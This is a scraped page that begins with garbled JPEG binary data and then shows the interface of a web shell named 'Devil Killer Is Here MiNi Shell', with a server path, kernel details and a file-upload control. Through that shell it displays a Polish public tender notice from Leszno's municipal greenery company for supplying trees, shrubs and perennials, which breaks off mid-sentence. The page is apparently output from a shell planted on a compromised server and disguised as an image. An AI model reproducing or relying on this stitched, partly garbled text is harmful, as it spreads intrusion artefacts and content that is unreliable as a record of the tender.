JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231009/0043371701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiału roślinnego dla Miejskiego Zakładu Zieleni w Lesznie Sp. z o. o. :<br/>- część I - drzewa<br/>- część II - krzewy i pnącza<br/>- część III - byliny i trawy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZAKŁAD ZIELENI W LESZNIE SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 382259957</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cypriana Kamila Norwida 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leszno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mzz.leszno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">mzz.leszno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> konserwacja i budowa terenów zieleni </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiału roślinnego dla Miejskiego Zakładu Zieleni w Lesznie Sp. z o. o. :<br/>- część I - drzewa<br/>- część II - krzewy i pnącza<br/>- część III - byliny i trawy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e819cbc9-6677-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00433717</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00038029/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa materiału roślinnego dla Miejskiego Zakładu Zieleni w Lesznie Sp. z o. o. : część I - drzewa, część II - krzewy i pnącza, część III- byliny i trawy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mzz_leszno/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mzz_leszno/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11 ust. 2<br/>Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych<br/>oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>7. Występuje limit objętości plików lub spakowanych folderów do ilości 10 plików lub spakowanych folderów przy maksymalnej<br/>sumarycznej wielkości 500 MB.<br/>8. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>ogłoszenia (BZP, TED lub ID postępowania).<br/>9. Zgodnie z art. 20 ust. 1 ustawy Pzp postępowanie o udzielenie zamówienia, z zastrzeżeniem wyjątków przewidzianych w ustawie<br/>Pzp, prowadzi się pisemnie.<br/>10. Zgodnie z art. 61 ust. 1 Pzp postępowaniu komunikacja i wymiana informacji oraz oferty, dokumenty, oświadczenia, zapytania do<br/>treści SWZ, wyjaśnienia i inne informacje dotyczące postępowania składane są przez Wykonawcę wyłącznie za pośrednictwem<br/>platformy, na której prowadzone jest postępowanie. Złożenie oferty, dokumentów i oświadczeń, zapytań do treści SWZ, wyjaśnień i<br/>innych informacji w inny sposób, z pominięciem przekazania ich za pośrednictwem platformy zakupowej uważa się za nieskuteczne.<br/>11. Zamawiający nie udziela ustnych informacji dotyczących postępowania, w szczególności dotyczących ogłoszenia, treści SWZ i<br/>ofert.<br/>12. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce<br/>„Wyślij wiadomość do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Pzp.<br/>13. Postępowanie, w tym korespondencja w postępowaniu prowadzona jest w języku polskim. Oznacza to, że wszelka<br/>korespondencja, oferta, oświadczenia oraz każdy dokument złożony wraz z ofertą sporządzony w języku obcym winien być złożony<br/>wraz z tłumaczeniem na język polski.<br/>14. W przypadku podmiotów wspólnych wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem (liderem).<br/>15. W formularzu ofertowym wykonawca poda adres poczty elektronicznej, na który będzie wysyłana korespondencja.<br/>16. W sprawach technicznych związanych z obsługą platformy należy korzystać z pomocy Centrum Wsparcia Klienta, które udzieli<br/>wszelkich informacji związanych z procesem składania ofert, rejestracji czy innych aspektów technicznych platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej &#34;RODO&#34;, informujemy, że:<br/>1. administratorem Pani/Pana danych osobowych jest Miejski Zakład Zieleni w Lesznie Sp. z o.o. z siedzibą w Lesznie przy ul.<br/>Cypriana Kamila Norwida 4, 64-100 Leszno, (dalej: Administrator) <br/>2. Dane kontaktowe Administratora: adres korespondencyjny – siedziba Administratora lub telefonicznie: 65 529 93 67, e-mail:<br/>sekretariat@mzz.leszno.pl<br/>3. Dane kontaktowe inspektora ochrony danych: Inspektor Ochrony Danych, Miejski Zakład Zieleni w Lesznie Sp. z o.o. z siedzibą w<br/>Lesznie przy ul. Cypriana Kamila Norwida 4, 64-100 Leszno, e-mail: iodo@mzz.leszno.pl;<br/>4. Pani/Pana dane osobowe przetwarzane będą na podstawie:<br/>a) art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego,<br/>b) art. 6 ust. 1 lit. b RODO w celu realizacji umowy, jeżeli oferta będzie najkorzystniejsza.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ust. 1 i 2 - ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, dalej &#34;Ustawa PZP&#34; oraz<br/>firma informatyczna świadcząca usługi IT dla Miejskiego Zakładu Zieleni w Lesznie Sp. z o.o.;<br/>6. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy PZP przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy przekracza 4 lata, okres przechowywania obejmuje<br/>cały czas obowiązywania umowy w sprawie zamówienia publicznego;<br/>7. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z Ustawy PZP;<br/>8. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>9. posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10. nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZZ-361-7/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia w ramach części I jest sukcesywna dostawa drzew. Szczegółowy opis zawarty został w<br/>Załączniku nr 1 do SWZ (Opis przedmiotu zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03452000-3 - Drzewa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w zakresie zadania przewiduje usługi, o których mowa w SWZ w ramach zadania podstawowego oraz<br/>zamówienia w ramach prawa opcji, zgodnie z art. 441 ustawy Pzp.<br/>2. Wykonawca jest obowiązany, po uprzednim otrzymaniu od Zamawiającego pisemnego zawiadomienia, dostarczyć<br/>materiał roślinny objęty prawem opcji w liczbie wskazanej w Załączniku nr 3 do SWZ. Skorzystanie z prawa opcji nie<br/>wymaga zawarcia aneksu do umowy.<br/>3. Zamawiający może skorzystać z prawa opcji nie później niż w terminie do dnia 31.12.2024 r.<br/>4. Zamawiający nie ma obowiązku skorzystania z prawa opcji. Zamawiający może skorzystać z opcji tylko częściowo.<br/>Wykonawcy nie przysługują z tego tytułu żadne roszczenia.<br/>5. Zamawiający może skorzystać z opcji stopniowo, składając Wykonawcy oświadczenia w różnych terminach, jednak nie<br/>przekraczających terminu wskazanego w ust. 2 aż do osiągnięcia maksymalnego zakresu zamówienia opisanego w<br/>Załączniku nr 3 do SWZ.<br/>6. Postanowienia umowy stosuje się odpowiednio do przedmiotu zamówienia objętego prawem opcji.<br/>7. Cena jednostkowa materiału roślinnego objętego prawem opcji będzie taka sama jak dla zamówienia podstawowego.<br/>8. Warunki dostawy materiału roślinnego objętego prawem opcji oraz warunki świadczenia przez Wykonawcę usług<br/>zawartych w ich cenie jednostkowej są takie same, jak w zamówieniu podstawowym.<br/>9. Określenie gatunków oraz ilości materiału roślinnego w ramach poszczególnych gatunkach w zakresie prawa opcji<br/>została określona w Załączniku nr 1 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru oferty najkorzystniejszej w oparciu o następujące kryteria oceny ofert:<br/>1) Opis sposobu oceny ofert według kryterium „Cena ofertowa” – waga kryterium to 60 pkt.<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w formularzu ofertowym. Pozostałe<br/>oferty zostaną ocenione wg wzoru wskazanego w SWZ.<br/>2) Opis sposobu oceny ofert według kryterium „Termin dostawy materiału roślinnego – waga kryterium to 40 pkt.<br/>W przedmiotowym kryterium oceniany będzie podany przez Wykonawcę w formularzu ofertowym termin dostawy materiału<br/>roślinnego wraz z rozładunkiem. Termin dostawy roślin Wykonawca winien podać w pełnych dniach kalendarzowych, licząc od dnia<br/>złożenia zapotrzebowania przez Zamawiającego. Maksymalną liczbę punktów otrzyma oferta z najkrótszym terminem wykonania<br/>dostawy (30 pkt). Pozostałe oferty zostaną ocenione wg wzoru wskazengo w SWZ:<br/>Zamawiający zastrzega, że w przypadku kryterium termin dostawy roślin:<br/>1. Zamawiający zastrzega, że termin dostaw materiału roślinnego nie może być dłuższy niż 14 dni kalendarzowych. Termin ten<br/>będzie liczony od dnia zgłoszenia zapotrzebowania przez Zamawiającego (w formie faksu lub drogą elektroniczną).<br/>2. Dokona odrzucenia oferty Wykonawcy na podstawie art. 226 ust. 1 pkt 5) ustawy – Prawo zamówień publicznych (t.j. Dz.U. z 2023<br/>r., poz. 1605) w sytuacji, gdy Wykonawca w ofercie wyznaczy termin dostaw materiału roślinnego dłuższy niż 14 dni<br/>kalendarzowych.<br/>3. W przypadku gdy Wykonawca wcale nie określi w ofercie terminu dostawy Zamawiający przyjmie, iż Wykonawca zaoferował<br/>termin dostaw roślin 14 dni kalendarzowych.<br/>4. W przypadku podania przez Wykonawcę terminu dostawy krótszego niż 2 dni kalendarzowe, do oceny i porównania ofert oraz do<br/>rozliczeń wynikających z umowy zostanie przyjęty termin dostaw roślin 2 dni kalendarzowe.<br/>5. Termin dostaw roślin wskazany przez Wykonawcę w ofercie będzie wiążący na etapie realizacji zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia w ramach części II jest sukcesywna dostawa krzewów i pnączy. Szczegółowy opis zawarty został<br/>w Załączniku nr 1 do SWZ (Opis przedmiotu zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03451300-9 - Krzewy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w zakresie zadania przewiduje usługi, o których mowa w SWZ w ramach zadania podstawowego oraz<br/>zamówienia w ramach prawa opcji, zgodnie z art. 441 ustawy Pzp.<br/>2. Wykonawca jest obowiązany, po uprzednim otrzymaniu od Zamawiającego pisemnego zawiadomienia, dostarczyć<br/>materiał roślinny objęty prawem opcji w liczbie wskazanej w Załączniku nr 3 do SWZ. Skorzystanie z prawa opcji nie<br/>wymaga zawarcia aneksu do umowy.<br/>3. Zamawiający może skorzystać z prawa opcji nie później niż w terminie do dnia 31.12.2024 r.<br/>4. Zamawiający nie ma obowiązku skorzystania z prawa opcji. Zamawiający może skorzystać z opcji tylko częściowo.<br/>Wykonawcy nie przysługują z tego tytułu żadne roszczenia.<br/>5. Zamawiający może skorzystać z opcji stopniowo, składając Wykonawcy oświadczenia w różnych terminach, jednak nie<br/>przekraczających terminu wskazanego w ust. 2 aż do osiągnięcia maksymalnego zakresu zamówienia opisanego w<br/>Załączniku nr 3 do SWZ.<br/>6. Postanowienia umowy stosuje się odpowiednio do przedmiotu zamówienia objętego prawem opcji.<br/>7. Cena jednostkowa materiału roślinnego objętego prawem opcji będzie taka sama jak dla zamówienia podstawowego.<br/>8. Warunki dostawy materiału roślinnego objętego prawem opcji oraz warunki świadczenia przez Wykonawcę usług<br/>zawartych w ich cenie jednostkowej są takie same, jak w zamówieniu podstawowym.<br/>9. Określenie gatunków oraz ilości materiału roślinnego w ramach poszczególnych gatunkach w zakresie prawa opcji<br/>została określona w Załączniku nr 1 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru oferty najkorzystniejszej w oparciu o następujące kryteria oceny ofert:<br/>1) Opis sposobu oceny ofert według kryterium „Cena ofertowa” – waga kryterium to 60 pkt.<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w formularzu ofertowym. Pozostałe<br/>oferty zostaną ocenione wg wzoru wskazanego w SWZ.<br/>2) Opis sposobu oceny ofert według kryterium „Termin dostawy materiału roślinnego – waga kryterium to 40 pkt.<br/>W przedmiotowym kryterium oceniany będzie podany przez Wykonawcę w formularzu ofertowym termin dostawy materiału<br/>roślinnego wraz z rozładunkiem. Termin dostawy roślin Wykonawca winien podać w pełnych dniach kalendarzowych, licząc od dnia<br/>złożenia zapotrzebowania przez Zamawiającego. Maksymalną liczbę punktów otrzyma oferta z najkrótszym terminem wykonania<br/>dostawy (30 pkt). Pozostałe oferty zostaną ocenione wg wzoru wskazengo w SWZ:<br/>Zamawiający zastrzega, że w przypadku kryterium termin dostawy roślin:<br/>1. Zamawiający zastrzega, że termin dostaw materiału roślinnego nie może być dłuższy niż 14 dni kalendarzowych. Termin ten<br/>będzie liczony od dnia zgłoszenia zapotrzebowania przez Zamawiającego (w formie faksu lub drogą elektroniczną).<br/>2. Dokona odrzucenia oferty Wykonawcy na podstawie art. 226 ust. 1 pkt 5) ustawy – Prawo 